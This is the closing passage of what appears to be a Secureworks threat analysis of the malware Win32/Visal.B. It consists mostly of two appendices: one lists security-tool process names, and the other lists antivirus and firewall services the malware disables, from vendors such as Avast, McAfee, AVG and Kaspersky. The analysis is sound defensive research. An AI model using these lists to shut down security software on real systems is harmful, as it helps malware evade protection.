ssvichosst.exe
sxs.exe
system.exe
tPSrv.exe
tca.exe
temp.exe
temp2.exe
toy.exe
trojandetector.ExE
trojanwall.ExE
trojdie.KxP
uiscan.exe
unp_test.ExE
update.exe
updater.dll
userdump.exe
v.exe
vba32ldr.exe
vbcmserv.exe
vbcons.exe
vbglobal.exe
vbimport.exe
vbinst.exe
vbscan.exe
vbsystry.exe
virusutilities.exe
vsmon.exe
vsserv.exe
whi.com
wscntfy.exe
wsctool.exe
yannh.cmd
ybj8df.exe
zonealarm

Appendix B. List of Services Targeted for Disabling by Win32/Visal.B

Avast! Antivirus
aswUpdSv
avast! Mail Scanner
avast! Web Scanner
AntiVirService
AntiVirMailGuard
AntiVirSchedulerService
AntiVirWebService
AntiVirFirewallService
NIS
MSK80Service
0053591272669638mcinstcleanup
mfefire
McNASvc
Mc0obeSv
McMPFSvc
McProxy
Mc0DS
mcmscsvc
McAfee SiteAdvisor Service
mfevtp
McNaiAnn
McShield
Avgfws9
AVG Security Toolbar Service
avg9wd
AVGIDSAgent
PAVFNSVR
Gwmsrv
PSHost
PSIMSVC
PAVSRV
PavPrSrv
PskSvcRetail
Panda Software Controller
TPSrv
SfCtlCom
TmPlw
TmProxy
TMBMServer
Arrakis3
LIVESRV
scan
VSSERV
sdAuxService
sdCoreService
AVP


ABOUT THE AUTHOR
COUNTER THREAT UNIT RESEARCH TEAM

The Secureworks Counter Threat Unit™ (CTU) is a dedicated threat research team that analyzes threat data across our global customer base and actively monitors the threat landscape.
Back to more Threat Analyses and Advisories

GET THE LATEST SECURITY UPDATES

Thank you for your submission.

Talk with an Expert

Thank you for submitting the form! We have received your request. A Secureworks team member will contact you within one business day.